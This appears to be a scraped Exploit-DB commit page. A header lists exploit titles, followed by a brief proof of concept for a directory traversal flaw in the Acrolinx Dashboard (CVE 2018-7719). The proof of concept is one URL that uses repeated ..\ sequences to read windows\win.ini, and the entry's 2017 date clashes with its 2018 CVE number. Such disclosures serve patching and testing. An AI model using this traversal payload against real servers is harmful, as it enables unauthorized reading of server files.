
4 changes to exploits/shellcodes Crashmail 1.6 - Stack-Based Buffer Overflow ( ROP execve ) Crashmail 1.6 - Stack-Based Buffer Overflow (ROP) Fast AVI MPEG Splitter 1.2 - Stack-Based Buffer Overflow LabF nfsAxe 3.7 - Privilege Escalation Acrolinx Server < 5.2.5 - Directory Traversal Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds 140721 - 170109) - Access Control Bypass Hikvision IP Camera versions 5.2.0 - 5.3.9 (Builds 140721 < 170109) - Access Control Bypass Laravel Log Viewer < 0.13.0 - Local File Download Linux/x86 - EggHunter Shellcode (11 Bytes) Linux/x86 - EggHunter + Null-Free Shellcode (11 Bytes)
15 lines
No EOL
406 B
Text
15 lines
No EOL
406 B
Text
# Exploit Title: Acrolinx Dashboard Directory Traversal
|
|
# CVE: CVE 2018-7719
|
|
# Date: 19.02.2017
|
|
# Exploit Author: Berk Dusunur
|
|
# Vendor Homepage: www.acrolinx.com
|
|
# Version:Before 5.2.5
|
|
|
|
PoC
|
|
|
|
Acrolinx dashboard windows works on the server.
|
|
|
|
|
|
http://localhost/..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
|
|
|
|
http://www.berkdusunur.net/2018/03/tr-en-acrolinx-dashboard-directory.html |